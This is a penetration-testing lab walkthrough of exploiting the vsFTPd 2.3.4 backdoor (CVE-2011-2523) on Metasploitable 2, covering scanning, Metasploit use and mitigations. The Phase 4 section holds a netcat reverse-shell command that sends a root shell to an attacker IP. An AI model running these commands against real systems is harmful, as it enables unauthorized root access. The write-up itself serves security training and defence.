A step-by-step walkthrough of exploiting the vsFTPd 2.3.4 backdoor vulnerability (CVE-2011-2523) in a controlled lab environment, demonstrating reconnaissance, exploitation with Metasploit, and establishing a reverse shell.# Penetration Testing Lab: vsFTPd 2.3.4 Backdoor Exploitation
This repository documents the process of identifying and exploiting the famous backdoor vulnerability in vsFTPd version 2.3.4 within a controlled lab environment (Metasploitable 2).
## Overview
During a routine penetration test, the vsFTPd service running on port 21 was identified as vulnerable. The service was found to be version 2.3.4, which contains a documented backdoor that allows unauthenticated remote command execution. This document details the steps taken to confirm the vulnerability and gain a reverse shell on the target system.
## Vulnerability Details
* **Service:** vsFTPd (Very Secure FTP Daemon)
* **Version:** 2.3.4
* **CVE:** CVE-2011-2523
* **Risk:** Critical (Remote Code Execution)
## Lab Setup
* **Attacker Machine:** Kali Linux
* **Target Machine:** Metasploitable 2
* **Network Configuration:** The machines were connected via a NAT and bridged network adapter, allowing the attacker to access services on the target's local IP address.
## Executive Summary
A critical backdoor was identified in the target's FTP service (vsFTPd 2.3.4). This vulnerability allows an unauthenticated attacker to gain remote command execution, ultimately leading to a full reverse shell on the system.
## Phase 1: Reconnaissance & Enumeration
The initial discovery was made using a port scan with `nmap`.
**Command:**
```bash
nmap -sS -sV -A <target-ip>
```
**Relevant Findings:**
```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
...
```
## Phase 2: Vulnerability Identification
The version `2.3.4` is notoriously vulnerable. This was confirmed using `searchsploit`.
**Commands:**
```bash
searchsploit vsftpd 2.3.4
```
*Output revealed several public exploits, confirming the vulnerability.*
## Phase 3: Initial Exploitation Attempts
### Attempt 1: Standalone Python Exploit
A public Python exploit was mirrored and executed but failed due to compatibility issues.
**Commands:**
```bash
searchsploit -m unix/remote/49757.py
python 49757.py <target-ip>
```
*Result: Script error (incompatible with Python 3).*
### Attempt 2: Metasploit Module
The Metasploit Framework provides a reliable exploit module.
**Commands:**
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run
```
*Result: The exploit ran successfully, triggering the backdoor. However, a standard Metasploit shell was not established. The backdoor opens a root shell on port 6200.*
## Phase 4: Manual Shell Access
The Metasploit module confirmed the backdoor was present.
### Step 1: Verify backdoor activity.
```bash
telnet <target-ip> 6200
```
*Observation: Connection established but hung, indicating a listening shell.*
### Step 2: Establish a Reverse Shell
A reverse shell was set up using Netcat for stability.
**On Attacker (Kali): Start listener.**
```bash
nc -lvnp 4444
```
**On Target (via backdoor): Execute reverse shell.**
```bash
/bin/nc <attacker-ip> 4444 -e /bin/bash
```
`4444`: Listener port.
`-e /bin/bash`: Executes bash shell.*
*Result: Netcat listener caught the connection, providing a root shell on the target.*
## Phase 5: Mitigation Strategies
Immediate Action: Upgrade vsFTPd to the latest version available from the official repository.
Network Controls: If upgrade is not possible, restrict FTP access at the network level (firewall) to only trusted IP addresses.
Compromise Assessment: A system running this vulnerable version should be considered fully compromised. A full forensic investigation and password resets are required.
Monitoring: Implement IDS/IPS rules to detect and block exploit attempts against this specific vulnerability.
## References
- Exploit-DB: [vsftpd 2.3.4 Backdoor Exploit](https://www.exploit-db.com/exploits/17491)
- CVE-2011-2523: [MITRE Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)
- NVD: [National Vulnerability Database Entry](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)
## Disclaimer
This information is for **educational purposes only**. It is intended for use in authorized lab environments to understand attack methodologies and improve defensive strategies. Unauthorized testing against systems you do not own is illegal.
登录后查看神龙缓存的 POC 文件快照
登录查看